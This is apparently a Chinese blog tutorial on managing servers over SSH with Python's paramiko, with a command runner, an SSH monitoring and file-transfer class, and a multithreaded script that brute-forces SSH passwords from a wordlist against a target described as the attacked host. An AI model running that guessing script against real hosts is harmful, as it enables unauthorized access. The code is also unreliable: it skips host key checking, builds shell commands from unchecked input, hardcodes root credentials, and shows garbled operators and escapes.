Python使用Paramiko实现SSH管理

2023-11-24 10:43:07 浏览数 (2)

paramiko 是一个用于在Python中实现SSHv2协议的库,它支持对远程服务器进行加密的通信。目前该模块支持所有平台架构且自身遵循SSH2协议,支持以加密和认证的方式,进行远程服务器的连接,你可以在Python中实现SSH客户端和服务器,并进行安全的文件传输和远程命令执行。

主要特点:

  1. SSH 支持: paramiko 提供了对 SSHv2 协议的完整支持,可以用于安全地连接和通信到远程服务器。
  2. SSH 客户端和服务端实现: paramiko 不仅可以用作 SSH 客户端,还可以在 Python 中实现 SSH 服务器。这意味着你可以使用 paramiko 来创建自己的 SSH 服务器,或者编写客户端与远程服务器进行通信。
  3. SFTP 文件传输: paramiko 包含了对 SFTP(SSH 文件传输协议)的实现,可以在安全通道上传输文件,支持上传和下载文件。
  4. 支持密钥认证: 除了用户名和密码认证外,paramiko 还支持使用密钥进行认证,包括支持 RSA 和 DSA 密钥。
  5. 多种认证方法: 支持多种认证方法,包括密码认证、密钥认证、GSS-API 认证等。
  6. 高级特性: 提供了一些高级特性,如端口转发(port forwarding)、代理支持等,使其适用于更复杂的网络场景。
  7. 跨平台: paramiko 可以在多个平台上运行,包括 Linux、Windows 和 macOS。
  8. 易用性: 提供了简单而易用的 API,使得在 Python 中进行 SSH 连接、文件传输等操作变得容易。
  9. 活跃的社区支持: paramiko 是一个开源项目,拥有活跃的社区支持。这意味着你可以在社区中找到文档、示例代码和得到技术支持。

实现简单SSH连接

代码语言:javascript复制
import paramiko,threading
import argparse

class MyThread(threading.Thread):
    def __init__(self,address,username,password,port,command):
        super(MyThread, self).__init__()
        self.address = address
        self.username = username
        self.password = password
        self.port = port
        self.command = command
    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
            stdin, stdout, stderr = ssh.exec_command(self.command)
            result = stdout.read()
            if not result:
                self.result = stderr.read()
            ssh.close()
            self.result = result.decode()
        except Exception:
            self.result = "0"
    def get_result(self):
        try:
            return self.result
        except Exception:
            return "0"

if __name__ == "__main__":
    # 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig
    parser = argparse.ArgumentParser()
    parser.add_argument("-a",dest="addr",help="指定一个IP地址")
    parser.add_argument("-u",dest="user",help="指定目标主机用户名")
    parser.add_argument("-p",dest="passwd",help="指定目标主机密码")
    parser.add_argument("-c",dest="command",help="指定需要执行的命令")
    args = parser.parse_args()
    if args.addr and args.user and args.passwd and args.command:
        obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command))
        obj.start()
        obj.join()
        ret = obj.get_result()
        if ret != "0":
            print(ret)
    else:
        parser.print_help()

实现SSH批量尝试

代码语言:javascript复制
import pexpect
import os,sys,time
import threading
import argparse

def SSHConnect(Host,User,Password,Port,Command):
    try:
        child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1)
        ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"])
        if ret == 0:                   # 连接超时
            child.close()
            return 0
        elif ret == 1:                 # SSH提示你是否确认连接
            child.sendline ('yes')     # 我们输入yes
            child.expect ('password: ')# 输入yes后应该提示输入密码,我们再次期待 password
            ret = child.expect([pexpect.TIMEOUT, 'password: '])
            if ret == 0:               # 连接超时
                child.close()
                return 0
        ret = child.sendline(Password)
        if ret == 5:
            #child.expect(pexpect.EOF)
            #return child.before
            return 1
        child.close()
        return 0
    except Exception:
        child.close()
        return 0

def ThreadBlast(Host,User,Password,Port,semaphore):
    semaphore.acquire()        # 加锁
    global number,PassCount
    RetCode = SSHConnect(Host,User,Password,Port,"pwd")
    if RetCode == 1:
        print("[*] 索引: {}/{} --> 密码: {}".format(str(number),str(PassCount),Password))
    else:
        print("[-] 索引: {}/{} --> 尝试: {}".format(str(number),str(PassCount),Password))
        
    number = number   1
    semaphore.release()       # 释放锁

if __name__ == "__main__":
    # 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log
    parser = argparse.ArgumentParser()
    parser.add_argument("-H","--host",dest="host",help="输入一个被攻击主机IP地址")
    parser.add_argument("-u","--user",dest="user",help="输入主机的用户账号,root")
    parser.add_argument("-p","--port",dest="port",help="输入SSH的端口号,22")
    parser.add_argument("-f","--file",dest="file",help="设置密码字典 wordlist.log")
    args = parser.parse_args()
    if args.host and args.user and args.port and args.file:
        number = 0
        semaphore = threading.Semaphore(4)
        fp = open(args.file,"r")
        PassList = fp.readlines()
        PassCount = len(PassList)
        for item in PassList:
            t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("n","")),args.port,semaphore))
            t.start()
    else:
        parser.print_help()

封装MySSH通用类

代码语言:javascript复制
import paramiko, math

class MySSH:
    def __init__(self, address, username, password, default_port):
        self.address = address
        self.default_port = default_port
        self.username = username
        self.password = password

    # 初始化SSH接口
    def Init(self):
        try:
            self.ssh_obj = paramiko.SSHClient()
            self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3,
                                 allow_agent=False, look_for_keys=False)
            self.sftp_obj = self.ssh_obj.open_sftp()
            return True
        except Exception:
            return False
        return False

    # 执行命令并返回执行结果
    def BatchCMD(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                result = str(result).replace("\n", "n")
                result = result.replace("b'", "").replace("'", "")
                return result
            else:
                return None
        except Exception:
            return None

    # 执行非交互命令 只返回执行状态 ,或真或假
    def BatchCMD_NotRef(self, command):
        try:
            stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3)
            result = stdout.read()
            if len(result) != 0:
                return True
            else:
                return None
        except Exception:
            return False

    # 将远程文件下载到本地
    def GetRemoteFile(self, remote_path, local_path):
        try:
            self.sftp_obj.get(remote_path, local_path)
            return True
        except Exception:
            return False

    # 将本地文件上传到远程
    def PutLocalFile(self, localpath, remotepath):
        try:
            self.sftp_obj.put(localpath, remotepath)
            return True
        except Exception:
            return False

    # 获取文件大小
    def GetFileSize(self, file_path):
        ref = self.BatchCMD("du -s "   file_path   " | awk '{print $1}'")
        return ref.replace("n", "")

    # 判断文件是否存在
    def IsFile(self, file_path):
        return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path))

    # 获取系统型号
    def GetSystemVersion(self):
        return self.BatchCMD("uname")

    # 关闭SSH接口
    def CloseSSH(self):
        try:
            self.sftp_obj.close()
            self.ssh_obj.close()
        except Exception:
            pass

    # 测试主机连通率
    def GetPing(self):
        try:
            if self.GetSystemVersion() != None:
                print("{} 已连通.".format(self.address))
                return True
            else:
                return False
        except Exception:
            return False

    # 获取文件列表,并得到大小
    def GetFileList(self, path):
        try:
            ref_list = []
            self.sftp_obj.chdir(path)
            file_list = self.sftp_obj.listdir("./")
            for sub_path in file_list:
                dict = {}
                file_size = self.GetFileSize(path   sub_path)
                dict[path   sub_path] = file_size
                ref_list.append(dict)
            return ref_list
        except Exception:
            return False

    # 将远程文件全部打包后拉取到本地
    def GetTarPackageAll(self, path):
        try:
            file_list = self.sftp_obj.listdir(path)
            self.sftp_obj.chdir(path)
            for packageName in file_list:
                self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName))
                self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName))
                self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName))
                return True
        except Exception:
            return True

    # 获取磁盘空间并返回字典
    def GetAllDiskSpace(self):
        ref_dict = {}
        cmd_dict = {"Linuxn": "df | grep -v 'Filesystem' | awk '{print $5 ":" $6}'",
                    "AIXn": "df | grep -v 'Filesystem' | awk '{print $4 ":" $7}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    # 根据不同版本选择不同的命令
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("n")
                    # 循环将其转换为字典
                    for each in ref_list:
                        # 判断最后是否为空,过滤最后一项
                        if each != "":
                            ref_dict[str(each.split(":")[1])] = str(each.split(":")[0])
            return ref_dict
        except Exception:
            return False

    # 拉取内存数据到本地。
    def GetAllMemSpace(self):
        cmd_dict = {"Linuxn": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 ":" $2}'",
                    "AIXn": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 ":" $4}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    mem_total = math.ceil(int(os_ref.split(":")[0].replace("n", "")) / 1024)
                    mem_free = math.ceil(int(os_ref.split(":")[1].replace("n", "")) / 1024)
                    percentage = 100 - int(mem_free / int(mem_total / 100))
                    print("利用百分比: {}  t 总内存: {}  t 剩余内存: {}".format(percentage,mem_total,mem_free))
                    return str(percentage)   " %"
        except Exception:
            return False

    # 获取CPU利用率数据
    def GetCPUPercentage(self):
        ref_dict = {}
        cmd_dict = {"Linuxn": "vmstat | tail -n 1 | awk '{print $13 ":" $14 ":" $15}'",
                    "AIXn": "vmstat | tail -n 1 | awk '{print $14 ":" $15 ":" $16}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("n")
                    for each in ref_list:
                        if each != "":
                            each = each.split(":")
                            ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]}
            print("CPU利用率数据: {}".format(ref_dict))
            return ref_dict
        except Exception:
            return False

    # 获取到系统负载利用率 也就是一分钟负载五分钟负载十五分钟负载
    def GetLoadAVG(self):
        ref_dict = {}
        cmd_dict = {"Linuxn": "cat /proc/loadavg | awk '{print $1 ":" $2 ":" $3}'",
                    "AIXn": "uptime | awk '{print $10 ":" $11 ":" $12}'"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("n")
                    for each in ref_list:
                        if each != "":
                            each = each.replace(",","").split(":")
                            ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]}
                            print("负载利用率: {}".format(ref_dict))
                            return ref_dict
            return False
        except Exception:
            return False

    # 获取系统进程信息,并返回字典格式
    def GetAllProcessSpace(self):
        ref_dict = {}
        cmd_dict = {"Linuxn": "ps aux | grep -v 'USER' | awk '{print $2 ":" $11}' | uniq",
                    "AIXn": "ps aux | grep -v 'USER' | awk '{print $2 ":" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.split("n")
                    for each in ref_list:
                        if each != "":
                            ref_dict[str(each.split(":")[0])] = str(each.split(":")[1])
            return ref_dict
        except Exception:
            return False

    # 检测指定进程是否存活
    def CheckProcessStatus(self,processname):
        cmd_dict = {"Linuxn": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"),
                    "AIXn": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("n")[0].replace(" ","").strip())
                    if ret_flag != "0":
                        return True
            return False
        except Exception:
            return "None"

    # 判断指定进程名是否存在,如果存在返回进程 {PID:0,CPU:0,MEM:0}
    def CheckProcessName(self,ProcName):
        cmd_dict = {"Linuxn": "ps aux | grep '"   ProcName   "' | grep -v 'grep' | awk {'print $2 ":" $3 ":" $4'} | head -1",
                    "AIXn": "ps aux | grep -v 'USER' | awk '{print $2 ":" $12}' | uniq"
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ref_list = os_ref.replace("n","").split(":")
                    ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]}
            return ref_dict
        except Exception:
            return False
        return False

    # 检测指定端口是否存活
    def CheckPortStatus(self,port):
        cmd_dict = {"Linuxn": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}")
            ,       "AIXn": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}")
                    }
        try:
            os_version = self.GetSystemVersion()
            for version, run_cmd in cmd_dict.items():
                if (version == os_version):
                    os_ref = self.BatchCMD(run_cmd)
                    ret_flag = str(os_ref.split("n")[0].replace(" ","").strip())
                    if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED":
                        return True
            return False
        except Exception:
            return False

    # 修改当前用户密码
    def SetPasswd(self,username,password):
        try:
            os_id = self.BatchCMD("id | awk {'print $1'}")
            print(os_id)
            if(os_id == "uid=0(root)n"):
                self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username))
                return True
        except Exception:
            return False

if __name__ == "__main__":
    ssh = MySSH("132.35.69.71","root","123456789",22)
    if ssh.Init() == True:
        ref = ssh.GetAllDiskSpace()
        print(ref)

0 人点赞